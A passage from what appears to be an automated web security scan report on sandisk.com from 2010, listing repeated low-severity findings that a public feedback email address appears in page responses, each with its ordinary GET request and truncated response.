Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.90. http://www.sandisk.com/business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/flash-memory-cards/sandisk-microsd-and-microsdhc-cards HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 36558
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.91. http://www.sandisk.com/business-solutions/mobile-handset-vendors  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38644
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.92. http://www.sandisk.com/business-solutions/mobile-handset-vendors.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38649
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.93. http://www.sandisk.com/business-solutions/mobile-handset-vendors/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38645
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.94. http://www.sandisk.com/business-solutions/mobile-handset-vendors/inand  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/inand

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors/inand HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37695
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.95. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/m2

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors/m2 HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37198
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.96. http://www.sandisk.com/business-solutions/mobile-handset-vendors/m2.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/m2.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors/m2.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37203
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.97. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/microsdhc

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors/microsdhc HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-handset-vendors
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37642
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:08 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.98. http://www.sandisk.com/business-solutions/mobile-handset-vendors/microsdhc.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-handset-vendors/microsdhc.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-handset-vendors/microsdhc.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/flash-memory-cards
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 37647
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.99. http://www.sandisk.com/business-solutions/mobile-network-operators  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-network-operators HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40121
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.100. http://www.sandisk.com/business-solutions/mobile-network-operators.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-network-operators.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40126
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.101. http://www.sandisk.com/business-solutions/mobile-network-operators/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators/

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-network-operators/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 40122
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:10 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.102. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators/memory-cards-

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-network-operators/memory-cards- HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38689
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.103. http://www.sandisk.com/business-solutions/mobile-network-operators/memory-cards-.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/mobile-network-operators/memory-cards-.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/mobile-network-operators/memory-cards-.aspx HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/business-solutions/mobile-network-operators
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 38694
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:42:12 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.104. http://www.sandisk.com/business-solutions/sd-worm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/sd-worm HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sandisk.com/
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1; __utmb=1.4.10.1289949765;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 41398
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 23:41:55 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascr
...[SNIP]...
<a
href="mailto:sitefeedback@sandisk.com" target="_blank">
...[SNIP]...

3.105. http://www.sandisk.com/business-solutions/sd-worm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sandisk.com
Path:   /business-solutions/sd-worm/

Issue detail

The following email address was disclosed in the response:

Request

GET /business-solutions/sd-worm/ HTTP/1.1
Host: www.sandisk.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1289949765.1.1.utmcsr=metricstream.com|utmccn=(referral)|utmcmd=referral|utmcct=/html/customers.htm; __utma=1.2134512458.1289949765.1289949765.1289949765.1; __utmc=1;